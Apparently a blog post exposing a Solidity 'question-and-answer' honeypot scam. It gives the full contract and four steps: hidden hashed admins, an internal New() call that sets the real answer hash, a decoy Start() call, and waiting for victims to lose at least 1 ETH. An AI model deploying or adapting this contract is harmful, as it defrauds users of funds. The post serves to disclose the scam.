

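pragma solidity 0.8.0;

contract Kiz_quiz
{
    function Try(string memory _response) public payable
    {
        require(msg.sender == tx.origin); // only an EOA can invoke Try()

        // if the response hash matches, the caller takes the whole ETH balance
        if(responseHash == keccak256(abi.encode(_response)) && msg.value > 1 ether)
        {
            payable(msg.sender).transfer(address(this).balance);
        }
    }

    string public question;

    bytes32 responseHash;

    // keyed by the keccak256 hash of an admin address, not by the address itself
    mapping (bytes32=>bool) admin;

    function Start(string calldata _question, string calldata _response) public payable isAdmin{
        // only takes effect while no response hash has been set yet
        if(responseHash == 0x0){
            responseHash = keccak256(abi.encode(_response));
            question = _question;
        }
    }

    function Stop() public payable isAdmin {
        // function body not preserved on this page
    }

    // sets the response hash directly, without revealing the response string
    function New(string calldata _question, bytes32 _responseHash) public payable isAdmin {
        question = _question;
        responseHash = _responseHash;
    }

    constructor(bytes32[] memory admins) {
        for(uint256 i=0; i< admins.length; i++){
            admin[admins[i]] = true;
        }
    }

    modifier isAdmin(){
        // the caller is an admin if the hash of its address is in the mapping
        require(admin[keccak256(abi.encodePacked(msg.sender))]);
        _;
    }

    fallback() external {}
}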


the contract code is here

Step 1: Deploy the contract and set two admins: one is an EOA, the other is a contract. The mapping stores the keccak256 hash of each admin address, so the admin addresses themselves are kept secret.

Step 2: Use the admin contract to call the New() function and set a _responseHash. This call is an internal transaction, so it does not show up in the honeypot contract's transaction history.

Step 3: Call the Start() function from the EOA admin account. It actually does nothing, because responseHash != 0x0 after step 2; its only purpose is to trick you into thinking you have the answer.

Step 4: Wait for a victim to invoke the Try() function, which defrauds them of at least 1 ETH each time.


Reposting is welcome with attribution: 刘世明的博客 » question-and-answer-honeypot